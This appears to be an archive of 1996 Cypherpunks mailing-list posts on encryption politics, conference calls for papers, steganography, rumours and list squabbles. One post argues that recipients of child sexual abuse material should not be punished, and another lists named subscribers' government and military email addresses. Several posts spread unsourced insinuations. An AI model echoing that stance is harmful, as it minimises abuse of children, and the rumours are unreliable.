Dyson Always make new mistakes! EDventure Holdings 1 (212) 924-8800 1 (212) 924-0240 fax 104 Fifth Avenue New York, NY 10011 USA www.edventure.com High-Tech Forum in Lisbon, October 27-29, 1996 PC Forum in Tucson, Arizona, March 23-26, 1997 From dthorn at gte.net Sun Sep 8 09:23:57 1996 From: dthorn at gte.net (Dale Thorn) Date: Mon, 9 Sep 1996 00:23:57 +0800 Subject: Kiddie porn on the Internet Message-ID: <32324996.2158@gte.net> "News" stories are now circulating on radio about child pornography on the Internet, and how an organization called "Save The Children" is working very hard to identify the trafficers and their accomplii. Save The Children is complaining that they can't find all of the dirty dealers of kid-porn, since much of the traffic is encrypted! So who is Save The Children? First, since they're an international organization raising funds in the U.S., they obviously operate at the pleasure of the State Department. Ho hum. Remember the incidents at the Denny's restaurant chain where Denny's was sued for discrimination against minorities? Did it seem a little bizarre for the 1990's? At the close of the litigation, Denny's suddenly sprouted tons of free fund-raising advertising for Save The Children, including placemats at each table with beautiful logo and address and phone number. Just send the money, etc. My questions to interested persons included whether someone may have approached Denny's for such cooperation BEFORE the discrimination suits, and whether Denny's may have refused at first. Well, don't jump to conclusions, and this is *NOT* a veiled accusation. I merely suggest that interested parties extend their inquiries into the various Internet-Monitors to include Save The Children. And by the way, I wonder what World Vision and National Medical Enterprises are up to these days? From liberty at gate.net Sun Sep 8 09:44:45 1996 From: liberty at gate.net (Jim Ray) Date: Mon, 9 Sep 1996 00:44:45 +0800 Subject: [NOISE] More From Rumor-central Message-ID: <199609081422.KAA36716@osceola.gate.net> -----BEGIN PGP SIGNED MESSAGE----- [This has nothing to do with cryptography, but it is related to other posts seen here recently.] Miami Herald reports today on page 3A that the National Transportation Safety Bureaucrats are "investigating an American Airlines pilot's report that a missile zoomed by his 757 on Aug. 29 as it flew near NASA and Navy facilities in Virginia on its way to Boston." An NTSB spokesman has confirmed an investigation (termed a 'preliminary probe') is ongoing. Not to be outdone, the FAA is investigating as well. All this is according to the Herald, and I offer no opinions about veracity or trustworthiness of this particular media organ or what caused the crash of flight 800. JMR Regards, Jim Ray -- DNRC Minister of Encryption Advocacy Thursday, September 5 is the day when, in 1698, Russian Czar Peter the Great imposed a tax on...beards. Please, don't tell Congress. [Source: The Advocates for Self-Government.] "As govt.s grow arithmetically, corruption grows exponentially." -- Ray's Law of official corruption. Defeat the Duopoly! Stop the Browne out. Harry Browne for President. Jo Jorgensen for Vice-president. http://www.HarryBrowne96.org/ http://www.twr.com/stbo ___________________________________________________________________ PGP id.E9BD6D35 51 5D A2 C3 92 2C 56 BE 53 2D 9C A1 B3 50 C9 C8 http://www.shopmiami.com/prs/jimray ___________________________________________________________________ -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMjLU4m1lp8bpvW01AQHB3AP/ROTTRCtg4LBrDwVSml2isdcm2GmFd01I 63dQg3o+ixBFldjXC3oHkQDUWSTyrpj/QXvUy43EGIdJMQ8MRI1+NCIu2R1ikF63 LasufEIvbCIzTcX1s+/n6vxciU6CYj2e5akbw4qBIK+eOr2roOoFADAKyQQbDdxx JvOvUzMVj/M= =WQHz -----END PGP SIGNATURE----- From rubin at usenix.ORG Sun Sep 8 10:15:40 1996 From: rubin at usenix.ORG (Aviel Rubin) Date: Mon, 9 Sep 1996 01:15:40 +0800 Subject: ANNOUNCEMENT AND CALL FOR PAPERS - 1998 USENIX Security Conference Message-ID: <199609081449.HAA03435@usenix.ORG> ************************************************************************* ANNOUNCEMENT AND CALL FOR PAPERS 7th USENIX Security Symposium January 26-29, 1998 Marriott Hotel-- San Antonio, Texas Sponsored by the USENIX Association, the UNIX and Advanced Computing Systems Professional and Technical Association In cooperation with: The CERT Coordination Center. Important Dates for Refereed Papers Papers due: September 9, 1997 Author notification: October 8, 1997 Camera-ready final papers due: December 9, 1997 Registration Materials Available: End October, 1997 (Authors, see "How to Submit a Refereed Paper" below.) Program Chair Avi Rubin, Bellcore Program Committee Carlisle Adams, Nortel Dave Balenson, Trusted Information Systems Steve Bellovin, AT&T Research Dan Boneh, Princeton University Diane Coe, Mitre Ed Felten, Princeton University Li Gong, JavaSoft Peter Honeyman, CITI, University of Michigan Hugo Krawczyk, IBM Watson Labs Jack Lacy, AT&T Research Hilarie Orman, DARPA/ITO Mike Reiter, AT&T Research David Wagner, University of California, Berkeley Readers Katherine T. Fithen, CERT Trent Jaeger, IBM Watson Labs Invited talks coordinator: Greg Rose, Qualcomm Conference home page: OVERVIEW The goal of this symposium is to bring together researchers, practitioners, system programmers, and others interested in the latest advances in security and applications of cryptography. This will be a four day symposium with two days of tutorials, followed by two days of refereed paper presentations, invited talks, works-in-progress presentations, and panel discussions. TUTORIALS Monday and Tuesday, January 26-27 Tutorials for both technical staff and managers will provide immediately useful, practical information on topics such as local and network security precautions, what cryptography can and cannot do, security mechanisms and policies, firewalls and monitoring systems. If you are interested in proposing a tutorial, contact the tutorial coordinator, Dan Klein: phone (412)421-2332 email . TECHNICAL SESSIONS Wednesday and Thursday, January 28-29 In addition to the keynote presentation, the technical program includes refereed papers, invited talks, a work in progress session, and panel sessions. There will be Birds-of-a-Feather sessions the last two evenings. You are invited to make suggestions to the program committee via email to . Papers that have been formally reviewed and accepted will be presented during the symposium and published in the symposium proceedings, published by USENIX and provided free to technical session attendees. Additional copies will be available for purchase from USENIX. SYMPOSIUM TOPICS Refereed paper submissions are being solicited in areas including but not limited to: * Adaptive security and system management * Analysis of malicious code * Applications of cryptographic techniques * Attacks against networks/machines * Computer misuse and anomaly detection * Copyright protection (technical solutions) * Cryptographic & other security tools * File and file system security * Network security * New firewall technologies * Security in heterogeneous environments * Security incident investigation and response * Security of Mobile Code * User/system authentication * World Wide Web security Note that this symposium is not about new codes, ciphers, nor cryptanalysis for its own sake. Papers must represent novel scientific contributions in computer security with direct relevance to the engineering of secure systems for the commercial sector. HOW TO SUBMIT A REFEREED PAPER (Please read carefully.) The guidelines for submission are a bit different from previous years. Authors must submit a mature paper in postscript format. Any incomplete sections (there shouldn't be many) should be outlined in enough detail to make it clear that they could be finished easily. Full papers are encouraged, and should be about 8 to 15 typeset pages. Submissions must be received by September 9, 1997. Along with your paper, please submit a separate email message containing the title, all authors, and their complete contact information (phone, fax, postal address, email), including an indication of which author is the contact author. Authors will be notified of acceptance on October 8, 1997. All submissions will be judged on originality, relevance, and correctness. Each accepted submission may be assigned a member of the program committee to act as its shepherd through the preparation of the final paper. The assigned member will act as a conduit for feedback from the committee to the authors. Camera-ready final papers are due on December 9, 1997. If you would like to receive detailed guidelines for submission and examples of extended abstracts, you may send email to: or telephone the USENIX Association office at (510) 528-8649. The Security Symposium, like most conferences and journals, requires that papers not be submitted simultaneously to another conference or publication and that submitted papers not be previously or subsequently published elsewhere. Papers accompanied by non-disclosure agreement forms are not acceptable and will be returned to the author(s) unread. All submissions are held in the highest confidentiality prior to publication in the Proceedings, both as a matter of policy and in accord with the U.S. Copyright Act of 1976. There will be one or two prizes awarded for best paper(s). WHERE TO SUBMIT For reliability, please send one copy of your paper to the program committee via each of two of the following methods. All submissions will be acknowledged. o Preferred Method: email (Postscript) to: o Alternate Method: postal delivery to Security Symposium USENIX 2560 Ninth St., Ste. #215 Berkeley CA 94710 U.S.A. Phone: (510) 528-8649 o Fax: (510) 548-5738 Vendor Exhibits Demonstrate your security product to our technically astute attendees responsible for security at their sites. We invite you to take part in the Vendor Display. The informal, table-top display allows you to meet with attendees informally and demonstrate in detail your security solutions. Contact CynthiaDeno Email: cynthia at usenix.org Phone: 408.335.9445 Fax 408.335.5327 Works-in-Progress Session (WIPs) The last session of the symposium will be a Works-in-Progress session consisting of five minute presentations. Speakers should provide a one or two paragraph abstract to the program chair by 6:00 pm on January 28, 1998 at the conference. These should be provided in person, not via email. The chair will post the schedule of presentations by noon on the 29th. Experience at other conferences has shown that usually, all of them are accepted. The five minute time limit will be strictly enforced. INVITED TALKS There will be several invited talks at the conference in parallel with the refereed papers. If you have suggestions for possible speakers, please send them to . REGISTRATION MATERIALS Materials containing all details of the technical and tutorial programs, registration fees and forms, and hotel information will be available at the end of October 1997. To receive the registration materials, please contact: USENIX Conference Office 22672 Lambert Street, Suite 613 Lake Forest, CA USA 92630 Phone: (714) 588-8649 Fax: (714) 588-9706 Email: Information can also be found under the Conference home page: . From whallen at capitalnet.com Sun Sep 8 10:34:13 1996 From: whallen at capitalnet.com (Wayne H. Allen) Date: Mon, 9 Sep 1996 01:34:13 +0800 Subject: talker Message-ID: <199609081513.LAA14900@ginger.capitalnet.com> At 03:03 AM 9/8/96 +0000, attila wrote: >=Dear Whoever, > > cypherpunks are *not* crackers; this is a crytographic > and political issues relating to cryptography mailing list. > > Well maybe, political issues galore certainly, but very very little to do with cryptography. I mean what does TWA 800 have to do with this list. I mean lets be completely honest here, whatever the original purpose of the list was for its been allowed to shift away from its intended purpose considerably. Wayne H.Allen whallen at capitalnet.com Pgp key at www.capitalnet.com/~whallen From dthorn at gte.net Sun Sep 8 11:06:37 1996 From: dthorn at gte.net (Dale Thorn) Date: Mon, 9 Sep 1996 02:06:37 +0800 Subject: Church of Scientology Message-ID: <3232DBB9.68B3@gte.net> Scuttlebut is, CoS rolled over on some pesky ultra-right-wingers as a favor to Morris Dees and various scumbag associates. For this, CoS got their long-awaited (40-plus years!) federal tax-free status. This status is big cash, so naturally, interested parties wanted to know under what rules did CoS get their tax-free gift, since long-standing high court decisions laid out the profit-making business plan of CoS in no uncertain terms, explicit and detailed. Problem is, nobody was able to get the details of the policy change - did CoS change their business plan, or did the fed change their rules? From jwilk at iglou.com Sun Sep 8 11:16:10 1996 From: jwilk at iglou.com (Blake Wehlage) Date: Mon, 9 Sep 1996 02:16:10 +0800 Subject: FW: Re: talker Message-ID: >Return-Path: >To: jwilk at iglou.com >Subject: Re: talker >References: >X-Juno-Line-Breaks: 1-5 >From: doom13 at juno.com (Floyd W Odom) >Date: Sun, 08 Sep 1996 10:56:43 EDT Check this out guys & gals > >Hey Blake cyphering sucks. You want to live on the like us? I went to >jail for jackin the westroads. And I still got away wit some shit. > > > >Doom13 > > ========================================== Blake Wehlage ��� R�V�L����� B�+ ��mP@� � ��� Goto: http://members.iglou.com/jwilk From jamesd at echeque.com Sun Sep 8 11:44:58 1996 From: jamesd at echeque.com (James A. Donald) Date: Mon, 9 Sep 1996 02:44:58 +0800 Subject: Encourage Singapore To Come Out Of the Stone Age Message-ID: <199609081635.JAA05916@dns1.noc.best.net> At 12:39 PM 9/3/96 +0800, Enzo Michelangeli wrote: > The idea that rights and values can be "natural" is contradicted by > several thousand years of history, during which absolutism or downright > tyranny have been well more common than freedom. The existence of foot binding in China is not evidence that women's feet have no particular natural shape. > The success of that misleading view in America, and by extension in most > of the western countries, is largely due to the unfortunate influence of > [...] When one engineers bridge, designed according to one theory of materials physics, stands up, and another engineers bridge, designed according to a different theory of material physics, falls down, does that not suggest that the first engineer knows what he is talking about, and the second engineer does not? > In the real world, freedom is a by-product of a materially prosperous > society (which is why capitalism generally produces free societies, but > socialism does not). First, you have this completely the wrong way around: Prosperity is the product of a free society. For example when the Dutch revolted from Spain, they were at first poorer than spain. Secondly there is ample counter evidence: For example in America before the european conquest, some Indian societies were extremely free and others, such as the Incas, had institutions very similar to modern totalitarianism, yet their material level was very different to today's, and not very different from each others. Again the Germanic tribes that conquered England had very high levels of liberty, yet were terribly poor, and the Icelanders of Saga period Iceland were very free, yet very poor. > Trying to build a free society by screaming loud > what the "natural" rights are supposed to be, has no better chances of > success than [...] Succeeded the last two times it was tried. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From roger at coelacanth.com Sun Sep 8 11:51:15 1996 From: roger at coelacanth.com (Roger Williams) Date: Mon, 9 Sep 1996 02:51:15 +0800 Subject: talker In-Reply-To: <19960908045041953.AAA106@IO-ONLINE.COM> Message-ID: >>>>> "Chris" == Adamsc writes: > Hmmmm... Want to bet our other friend at juno.com sent him? I > might just end up killfiling juno.com... Obviously a low-IQ area > of the net. Yup -- you're never going to see a very high SNR out of Juno: "Juno is completely free: no monthly charges, no hourly charges, no per-message charges, no sign-up fees, and no subscription fees. You don't have to pay for the software..." "Instead of charging its members, Juno will rely on revenues derived largely from selectively targeted advertising..." Unfortunately, this policy also means that bogon-rich Junons can't abuse Usenet for free, so they're spending their time party-crashing mailing lists... -- Roger Williams finger me for my PGP public key Coelacanth Engineering consulting & turnkey product development Middleborough, MA wireless * DSP-based instrumentation * ATE tel +1 508 947-8049 * fax +1 508 947-9118 * http://www.coelacanth.com/ From stephen at iu.net Sun Sep 8 12:08:51 1996 From: stephen at iu.net (Stephen Cobb) Date: Mon, 9 Sep 1996 03:08:51 +0800 Subject: TWA 800 - Friendly Fire? Message-ID: <1.5.4.32.19960908170804.006ae62c@iu.net> > >-Millie >sfuze at tiac.net > >"What we have here is a FAILURE to COMMUNICATE" (some song) > Actually some movie, Cool Hand Luke, Paul Newman. The WAV file is around here somewhere. s. From paul at fatmans.demon.co.uk Sun Sep 8 12:09:29 1996 From: paul at fatmans.demon.co.uk (paul at fatmans.demon.co.uk) Date: Mon, 9 Sep 1996 03:09:29 +0800 Subject: What the NSA is patenting Message-ID: <842190632.29813.0@fatmans.demon.co.uk> >The NSA STM method is related to reading _very subtle_ variations in >magnetic domain modifications. Jitter in read-write head positions can be >thought of as a noise (N) added to some signal (S)l. > Extraction of signals >in low S/N ration environments is a well-developed science. As anyone who has ever subscribed to alt.sex will know ;-) Datacomms Technologies web authoring and data security Paul Bradley, Paul at fatmans.demon.co.uk Http://www.fatmans.demon.co.uk/crypt/ "Don`t forget to mount a scratch monkey" -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6 mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53 6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3 sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az4= =riHc -----END PGP PUBLIC KEY BLOCK----- From byrd at ACM.ORG Sun Sep 8 12:47:15 1996 From: byrd at ACM.ORG (Jim Byrd) Date: Mon, 9 Sep 1996 03:47:15 +0800 Subject: Church of Scientology Message-ID: <2.2.16.19960908172415.25478cfe@super.zippo.com> At 07:44 AM 9/8/96 -0700, Dale Thorn wrote: >Scuttlebut is, CoS rolled over on some pesky ultra-right-wingers as a >favor to Morris Dees and various scumbag associates. For this, CoS got >their long-awaited (40-plus years!) federal tax-free status. > >This status is big cash, so naturally, interested parties wanted to know >under what rules did CoS get their tax-free gift, since long-standing >high court decisions laid out the profit-making business plan of CoS in >no uncertain terms, explicit and detailed. > >Problem is, nobody was able to get the details of the policy change - >did CoS change their business plan, or did the fed change their rules? This is exactly the subject of a lawsuit by Tax Analysts, Inc. against the IRS. This is still in progress. The cult is not a party to this suit, so they can't bring their lawyers into this one. From doom13 at juno.com Sun Sep 8 13:40:08 1996 From: doom13 at juno.com (Floyd W Odom) Date: Mon, 9 Sep 1996 04:40:08 +0800 Subject: No Subject Message-ID: <19960908.123126.3118.1.Doom13@juno.com> Has anyone been on a bbs lately. I just subscribed to cypherpunks mailing list. From jamesd at echeque.com Sun Sep 8 13:54:00 1996 From: jamesd at echeque.com (James A. Donald) Date: Mon, 9 Sep 1996 04:54:00 +0800 Subject: talker Message-ID: <199609081833.LAA07514@dns2.noc.best.net> At 12:26 PM 9/8/96 -0500, Roger Williams wrote: > Yup -- you're never going to see a very high SNR out of Juno: Yes, the anarchy list has a persistent moron from Juno.com, educated well above his intelligence. A seriously proflic loon. I have told eudora to transfer everything from juno.com into my loon file, regardless of author. Makes AOL.com look like caltech. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From askbill at microsoft.com Sun Sep 8 13:54:24 1996 From: askbill at microsoft.com (Askbill Questions) Date: Mon, 9 Sep 1996 04:54:24 +0800 Subject: Thank you Message-ID: Thank you for your email. I appreciate you taking the time to write to me. As you can probably imagine, I receive hundreds of messages from outside of Microsoft each day. While I love to read people's views and share ideas about technology, unfortunately, I am not able to answer each and every inquiry. Instead, I'll be responding to some of your questions in my column. The second column each month will be dedicated to answering questions from readers like you, so keep reading and I'll do my best to address the topics that are of interest to readers worldwide. I also invite you to check out the Microsoft website at http://www.microsoft.com/corpinfo where you can find all of the columns, as well as lots of additional fun and useful information. Thank you for your continued support of Microsoft and our products and best of luck with all your endeavors, Bill Gates From doom13 at juno.com Sun Sep 8 14:03:51 1996 From: doom13 at juno.com (Floyd W Odom) Date: Mon, 9 Sep 1996 05:03:51 +0800 Subject: 9yrold Message-ID: <19960908.125436.3318.0.Doom13@juno.com> Does anyone out there know any kids mailing lists, because my little brother Richard just joined and he doesn't have anything to mail to he's only 9 years old. floyd odom From jfricker at vertexgroup.com Sun Sep 8 14:04:56 1996 From: jfricker at vertexgroup.com (John F. Fricker) Date: Mon, 9 Sep 1996 05:04:56 +0800 Subject: PRESS RELEASE: GERMANY CENSORS DUTCH WEBSITE WWW.XS4ALL.NL Message-ID: <2.2.32.19960908184651.00ac63d4@vertexgroup.com> At 03:24 AM 9/6/96 -0700, you wrote: > >* wouldn't it be deliciously ironic if the "Free Speech Blue Ribbon" now >attached to so many pages were to be joined by a "Star of David"? This Star >of David symbol could mean "We support freedom to read, and our site >contains the "Radikal" publication which Germans are forbidden to access." > Well I think the Star of David has so many meanings that the message may get muddled. Seems like busy sites can support the mirror of their choice by putting a note such as "This is a Radikal site". The "mispelling" is the medium. >(I know nothing of how such symbolic campaigns are actually launched and >managed, so I'm suggesting the hint of an idea. I do think mirroring the >banned publication (_any_ banned publication, by _any_ government) on as >many sites as possible is a Good Idea.) > Tell two people. Put up a mirror. Add a link on a busy page. Did I miss anything? --j http://206.101.74.42 is a Radikal site From pstira at escape.com Sun Sep 8 14:15:53 1996 From: pstira at escape.com (pstira at escape.com) Date: Mon, 9 Sep 1996 05:15:53 +0800 Subject: What the NSA is patenting In-Reply-To: <84215235509971@cs26.cs.auckland.ac.nz> Message-ID: On Sun, 8 Sep 1996 pgut001 at cs.auckland.ac.nz wrote: > >I'm sure there's going to be a REALLY marketable device out of this to get > >royalties off of. > > No, the market for the more mainstream MFM's is small (a few K devices), for > MFSTM's it's even smaller (a few dozen?). MFSTM's are usually built by You obviously did NOT detect my sarcasm about the previous subject. :) -Millie, who was trying to say that patenting such a device is patently stupid From declan at eff.org Sun Sep 8 15:12:07 1996 From: declan at eff.org (Declan McCullagh) Date: Mon, 9 Sep 1996 06:12:07 +0800 Subject: TWA 800 - Friendly Fire? In-Reply-To: Message-ID: Got a note from Brock on the original TWA 800 posting from "MacDonald" -- > I can't believe anyone would stand for this kind of shit. Total, > absolute garbage. And I'll bet anyone $5,000 to prove I'm wrong in > calling his "rumor" from a "reliable source" a total myth. $5,000 ain't chump change. Anyone want to collect? -Declan On Sun, 8 Sep 1996, Black Unicorn wrote: > On Fri, 6 Sep 1996, John Anonymous MacDonald wrote: > > > The latest rumor. > > > > The message came to me from a man who was Safety Chairman for the > > Airline Pilots Association for many years and he is considered an > > expert on safety. He would not ever spread idle rumor. In short, > > he is usually quite certain before saying anything! > > Feel free to cite his credentials AFTER you disclose his name. > > :) > > -- > I hate lightning - finger for public key - Vote Monarchist > unicorn at schloss.li > // declan at eff.org // I do not represent the EFF // declan at well.com // From declan at eff.org Sun Sep 8 15:18:06 1996 From: declan at eff.org (Declan McCullagh) Date: Mon, 9 Sep 1996 06:18:06 +0800 Subject: Court challenge to AOL junk-mail blocks In-Reply-To: <1.5.4.32.19960907204437.0068b4d8@pop3.interramp.com> Message-ID: I will of course defer to Will's grasp of the facts, since I haven't been following this story or interviewing the principals. (Though I have read the court's opinion and Reid's article in the Philly Inquirer.) The judge did mention "status quo" in his opinion. I would hope that "status quo" would mean the ability of ISPs to offer and enforce whatever contracts they want -- including banning incoming spam -- without the intervention of the government. Unless, of course, the ISP breaks the contract, but in that case the plaintiffs should be the customers, not the spammer. Contrary to what CyberPromo has been telling the press, Internet email is not the U.S. Postal Service. In fact, the USPS has a rather horrific monopoly that has given rise to Comstockery in the last century, the Robert Thomas case more recently, laws giving the USPS the sole right to insert mail in your mailbox, and las banning private enterprise from delivering "non-urgent" mail. That kind of bureaucratic monopolistic foolishness is not what the Net needs. -Declan On Sat, 7 Sep 1996, Will Rodger wrote: > > At 12:27 PM 9/7/96 -0700, Declan McCullagh wrote: > >If AOL wants to stop spammers, let them. They have every right to do so as > >long as their agreement with their customers permits it. It's a matter of > >contract law between AOL and its customers and should not involve the > >spammers and a lawsuit brought by the spammers. > > > >It seems as though the judge was snookered by the spammers' claim of U.S. > >Mail-like service, free speech, blah. The right to free speech does > >extend to corporations; in that way, it includes the right *not* to speak. > > > > Declan raises a good point. But I'm guessing it's a bit more complex than > that. CyberPromo and AOL lawyers tell me the court slapped down AOL simply > to "keep the status quo." Both sides used those very words, in fact. > > What's more, CyberPromo talks a good game on the First Amendment, but used > computer fraud and unfair competition statutes - not the Bill of Rights - in > its original filing against AOL. So what's going on? > > It seems Weiner is _very_ aware that this case deals with things never > before argued in court. No one has really sorted out just how much e-mail - > if any - an ISP is obligated to carry against its wishes. What Weiner > decides this fall may not set the kind of precendent that the case of the > Pentagon Papers did, but will be important for a while at least. > > Will // declan at eff.org // I do not represent the EFF // declan at well.com // From declan at eff.org Sun Sep 8 15:24:14 1996 From: declan at eff.org (Declan McCullagh) Date: Mon, 9 Sep 1996 06:24:14 +0800 Subject: Cypherpunks subscribers - Singapore and NZ gvts, plus IRS Message-ID: I suppose it would be only polite to ask the Singapore government folks and IRS employees to join our conversation. The cypherpunks list now has nearly 1,400 direct subscribers, plus whoever reads it through local mail-news gateways. (Note I'm not indicating that a .gov.sg or .irs.gov address implies anything about an individual's personal political beliefs.) -Declan // declan at eff.org // I do not represent the EFF // declan at well.com // video at nhmxw0.fnal.gov e875836 at popcorn.llnl.gov foley_p at kosmos.wcc.govt.nz cypherpunks at cheetah.llnl.gov cypherpunks at citec.qld.gov.au kwans at nii.ncb.gov.sg sklim at nii.ncb.gov.sg cypherpunks-x at nasirc.hq.nasa.gov rromine at nsf.gov peter at nii.ncb.gov.sg kfall at ee.lbl.gov timb at defcen.gov.au marty.burkhouse at ccmail.irs.gov peterb at lanl.gov cypherpunks-2localnews at mailhost.dpie.gov.au stevek at telchar.jpl.nasa.gov il1 at ornl.gov walters at snad.ncsl.nist.gov bgamble at wo0033wp.wo.blm.gov "Bruce C. Dovala" kmigoe at orion.ncsc.mil kda36 at naic.wpafb.af.mil mengertc at seoul-1sig.korea.army.mil tut at ncr.disa.mil holmesb at rl.af.mil serverb at mqg-smtp3.usmc.mil sezgin at tsk.mil.tr halland at hq.hqusareur.army.mil From jlv at signet.sig.bsh.com Sun Sep 8 15:49:51 1996 From: jlv at signet.sig.bsh.com (Jason Vagner) Date: Mon, 9 Sep 1996 06:49:51 +0800 Subject: Photoshop, Steganograhy, and cypherpunks? In-Reply-To: <199609070003.TAA11985@pentagon.io.com> Message-ID: > > 1) If I hide some PGP encrypted data in a > > gif, jpg or wav file will there be any tell tale > > signs to the naked eye of an expert? If yes, > > what are they? > > If you stego too many bits in a figure, it may become apparent. The new version of Photoshop coming out this fall includes the ability to embed "digital watermarking": (from http://www.news.com/News/Item/0,4,3188,00.html: Digital watermarking adds copyright information to a photograph that doesn't alter the photo's appearance. The watermark is detectable even after the photo is edited or printed and rescanned. Question: Will stegonagrphying (?) the picture with noise mar the watermark? Will a digital signature *and* something embedded into the graphic through steganography seriosly affect a 24-bit image? Furthermore: What about browsers? Could cookies or binary info be embedded into images on the fly so that a java applet could preserve information or states between pages, of different sites? Just thoughts.. Jason Vagner From zachb at netcom.com Sun Sep 8 16:07:14 1996 From: zachb at netcom.com (Z.B.) Date: Mon, 9 Sep 1996 07:07:14 +0800 Subject: talker In-Reply-To: <199609081833.LAA07514@dns2.noc.best.net> Message-ID: On Sat, 7 Sep 1996, James A. Donald wrote: > At 12:26 PM 9/8/96 -0500, Roger Williams wrote: > > Yup -- you're never going to see a very high SNR out of Juno: > > Yes, the anarchy list has a persistent moron from Juno.com, educated > well above his intelligence. A seriously proflic loon. > > I have told eudora to transfer everything from juno.com into my > loon file, regardless of author. Makes AOL.com look like > caltech. I just checked www.juno.com to see what kind of system they have, and it appears that it is a free email service. No charges at all. No wonder we get so many idiots from there - free mail and they probably don't bother to verify the people they give service to, either. --- Zach Babayco zachb at netcom.com <----- finger for PGP public key http://www.geocities.com/SiliconValley/Park/4127 From eagle at armory.com Sun Sep 8 16:12:24 1996 From: eagle at armory.com (Jeff Davis) Date: Mon, 9 Sep 1996 07:12:24 +0800 Subject: Denver Physical Cypherpunks Meeting? Message-ID: <9609081327.aa28086@deepthought.armory.com> Anyone in the front range interested in a physical meeting? Majordomo's Net Cafe at 1401 Ogden is a natural. Let me know. I'm teaching some fundamental crypto classes there next month, and it's never a bad idea to get our heads together on effecting the passage of Pro Code and SAFE. -- According to John Perry Barlow: *What is EFF?* "Jeff Davis is a truly gifted trouble-maker." *email * *** O U T L A W S On The E L E C T R O N I C F R O N T I E R **** US Out Of Cyberspace!!! Join EFF Today! *email * From blancw at cnw.com Sun Sep 8 16:19:05 1996 From: blancw at cnw.com (blanc) Date: Mon, 9 Sep 1996 07:19:05 +0800 Subject: John Locke on True Names Message-ID: <01BB9D8D.09917DA0@king1-22.cnw.com> 9. But it will be here said that, if _moral knowledge_ be placed in the contemplation of our own _moral ideas_, and those, as other modes, be of our own making, what strange notions will there be of _justice_ and _temperance_? What confusion of virtues and vices, if everyone may make what _ideas_ of them he pleases? No confusion or disorder in the things themselves, nor the reasonings about them; no more than (in mathematics) there would be a disturbance in the demonstration, or a change in the properties of figures and their relations one to another, if a man should make a triangle with four corners, or a _trapezium_ with four right angles: that is in plain _English_, change the names of the figures and call that by one name which mathematicians called ordinarily by another. For let a man make to himself the _idea_ of a figure with three angles whereof one is a right one, and call it, if he please, _equilaterum_ or _trapezium_ or anything else, the properties of and demonstrations about that _idea_ will be the same as if he called it a _rectangular-triangle_. I confess, the change of the name, by the impropriety of speech, will at first disturb him who knows not what _idea_ it stands for; but as soon as the figure is drawn, the consequences and demonstrations are plain and clear. Just the same is it in _moral knowledge_: let a man have the _idea_ of taking from others, without their consent, what their honest industry has possessed them of, and call this _justice_ if he please. He that takes the name here without the _idea_ put to it will be mistaken, by joining another _idea_ of his own to that name; but strip the _idea_ of that name or take it such as it is in the speaker's mind, and the same things will agree to it as if you called it _injustice_. Indeed, wrong names in moral discourses breed usually more disorder, because they are not so easily rectified as in mathematics, where the figure once drawn and seen makes the name useless and of no force. For what need of a sign, when the thing signified is present and in view? But in moral names, that cannot be so easily and shortly done, because of the many decompositions that go to the making up of the complex _ideas_ of those modes. But yet for all this, the _miscalling_ of any of those _ideas_, contrary to the usual signification of the words of that language, hinders not but that we may have certain and demonstrative knowledge of their several agreements and disagreements, if we will carefully, as in mathematics, keep to the same precise _ideas_ and trace them in their several relations one to another, without being led away by their names. If we but separate the _idea_ under consideration from the sign that stands for it, our knowledge goes equally on in the discovery of real truth and certainty, whatever sounds we make use of. ~ An Essay Concerning Human Understanding Chapter IV: Of the Reality of Knowledge From 102540.2453 at compuserve.com Sun Sep 8 16:21:17 1996 From: 102540.2453 at compuserve.com (Blak Dayz) Date: Mon, 9 Sep 1996 07:21:17 +0800 Subject: Kiddie porn on the Internet Message-ID: <960908191449_102540.2453_HHV35-1@CompuServe.COM> I believe that you have a valid p.o.v on this subject on that: 1. The Save Our Children, kill the kiddie porn, will have trouble being enforced due to the large amounts of encryption and safe IRC fserves. If they really wanted to enforce the Kill The Porn, then they should target the adults by child pyschologist visits with the children during school hours. 2. The suspicion of the private organization "extortion" has valid backing in that several coincidences have occured such as the one with Dennys. If a person would research the matter further they would come upon several cases. *** The recievers of the porn should not be punished for the photographers action, the same as if I would complain that someone burglarized my home becuase i left the door open. It was their ignorance that caused their loss. Blak Dayz of the DAS From ravage at ssz.com Sun Sep 8 16:32:23 1996 From: ravage at ssz.com (Jim Choate) Date: Mon, 9 Sep 1996 07:32:23 +0800 Subject: talker (fwd) Message-ID: <199609082141.QAA03554@einstein> Forwarded message: > Date: Sun, 8 Sep 1996 13:23:06 -0700 (PDT) > From: "Z.B." > Subject: Re: talker > > I just checked www.juno.com to see what kind of system they have, and it > appears that it is a free email service. No charges at all. No wonder > we get so many idiots from there - free mail and they probably don't > bother to verify the people they give service to, either. Well we know at least one cpunk who is anti-anonymity.... Jim Choate > From blancw at cnw.com Sun Sep 8 16:38:45 1996 From: blancw at cnw.com (blanc) Date: Mon, 9 Sep 1996 07:38:45 +0800 Subject: Encourage Singapore To Come Out Of the Stone Age Message-ID: <01BB9D91.3EF3BB80@king1-22.cnw.com> From: James A. Donald, in reply to Enzo Michelangeli: > Trying to build a free society by screaming loud > what the "natural" rights are supposed to be, has no better chances of > success than [...] Succeeded the last two times it was tried. ........................................................................................ But it was not merely "screaming" about what the "natural" rights ought to be - it was presenting a more definite and clear picture of them to the mind of the beholders (who hardly had any such ideas in their mind), as well as backing up the description of these rights with the intent to secure them through physical force, if necessary (as one might expect). Screaming aloud about having "natural" rights and then sitting back and waiting for them to be recognized stands little or no chance of success with those who are obviously unsympathetic and are in a position of power over others. Knowing what one is talking about, being able to convey it with the conviction of certainty, and being prepared to act to secure what it is "rightful" to have, is 